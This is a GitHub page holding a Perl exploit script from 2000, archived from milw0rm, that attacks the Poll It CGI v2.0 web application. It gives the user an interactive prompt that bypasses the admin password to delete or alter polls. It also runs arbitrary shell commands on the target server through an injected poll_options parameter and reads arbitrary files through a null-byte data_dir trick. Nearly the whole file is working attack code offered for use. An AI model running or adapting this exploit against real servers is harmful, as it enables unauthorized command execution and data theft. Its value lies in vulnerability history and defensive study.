FilesExpand file tree

 master

/

177.pl

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

192 lines (157 loc) · 4.61 KB

 master

/

177.pl

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

192 lines (157 loc) · 4.61 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

#!/usr/bin/perl

######################################

# #

# #

# Poll It CGI v2.0 exploit #

# keelis/havoc korp 2000 #

# #

# shouts to modjo, p, zen, kd, #

# ab, all the script kiddies. #

# #

# #

# keelis(at)hushmail(dot)com #

# #

# #

######################################

use Socket;

($host, $cgi_loc) = @ARGV[0,1];

$ip=inet_aton($host);

print("\n\t+--- Poll It CGI v2.0 exploit ---+");

print("\n\t+--- keelis/havoc korp 2000 ---+\n\n\n");

usage() if (!defined($host) || !defined($cgi_loc));

while(true)

{

print "[poll\@$host] ";

$stdin = \*STDIN;

$cmdin = <$stdin>;

chomp($cmdin);

($cmd, $param) = split(/ /, $cmdin, 2);

if ($cmd eq "d")

{

$request = "?load=admin&admin_password=&action=delete_poll";

$success_msg = "current poll has been deleted\n\n";

make_request();

}

if ($cmd eq "e")

{

$request = "?load=admin&admin_password=&action=expire_poll";

$success_msg = "current poll has been expired\n\n";

make_request();

}

if ($cmd eq "c")

{

if (!defined($param))

{

print "you need to specify a voting topic for the new poll\n\n";

next;

}

$request = "?load=admin&admin_password=&action=create_new&new_pollaction=1&show_after=1&new_title=$param";

$success_msg = "created new poll with voting topic: \"$param\"\n\n";

make_request();

}

if ($cmd eq "a")

{

if (!defined($param))

{

print "you need to specify the text for the new voting option\n\n";

next;

}

$request = "?load=admin&admin_password=&action=add_option&add_option=$param";

$success_msg = "voting option added to current poll: \"$param\"\n\n";

make_request();

}

if ($cmd eq "g")

{

if (!defined($param))

{

print "you need to specify the command to be run\n\n";

next;

}

$request = "?load=admin&admin_password=&action=add_option&add_option=none&poll_options=$param%7C";

$success_msg = "command has been run on remote server: \"$param\"\n\n";

make_request();

}

if ($cmd eq "r")

{

if (!defined($param))

{

print "you need to specify the file to be read\n\n";

next;

}

$request = "?load=admin&data_dir=$param%00";

$success_msg = "contents of \"$param\" follow:\n\n";

make_request();

}

if ($cmd eq "?" || $cmd eq "h" || $cmd eq "help")

{

print "\n? \t\tshow this help screen\n";

print "d \t\tdelete current poll\n";

print "e \t\texpire current poll\n";

print "c <param>\tcreate new poll using <param> as topic\n";

print "a <param>\tadd <param> to voting options\n";

print "r <param>\tread the file <param> in remote server\n";

print "g <param>\trun <param> in the remote server\n";

print "x \t\texit pollex.pl shell\n\n";

next;

}

if ($cmd eq "x")

{

print "\n";

last;

}

print "command not found. use \"?\" for help screen.\n\n";

}

sub make_request {

$request=~s/ /+/g;

$request=~s/\\/%5C/g;

$request=~s/\//%2F/g;

my @req=sendraw("GET $cgi_loc$request HTTP/1.1\r\nHost: $host\r\n\r\n");

$reqanswer=join('', @req);

($httpv, $httpcode) = split(/ /, $reqanswer);

$httpcode = substr($httpcode, 0, 3);

if ($httpcode eq "200") {

print $success_msg if ($cmd ne "r");

} else {

if ($httpcode ne "404")

{

print "httpd returned an error code:\n\n";

print $reqanswer,"\n";

} else {

die "unexpected httpd error code 404. aborting...\n\n"

}

}

if ($cmd eq "r")

{ $reqanswer=substr($reqanswer, index($reqanswer, "\r\n\r\n")+4);

if (substr($reqanswer, 6, 15) eq "Template : File")

{

print "file \"$param\" not found or non-readable from cgi\n\n";

} else {

print $success_msg;

print $reqanswer,"\n";

}

}

next;

}

sub usage {

print "Usage: pollex.pl <host> <cgi_loc>\n\n";

print "\thost :\thost/ip where CGI resides\n";

print "\tcgi_loc:\tpath to the CGI (non-SSI version needed)\n\n";

exit(0);

}

sub sendraw {

my ($pstr)=@_;

socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||

die("socket problems... aborting.\n");

if(connect(S,pack "SnA4x8",2,80,$ip)){

select(S);

$|=1;

print $pstr;

my @in=<S>;

select(STDOUT);

close(S);

return @in;

} else {

die("can\'t connect... aborting.\n");

}

}

# milw0rm.com [2000-11-15]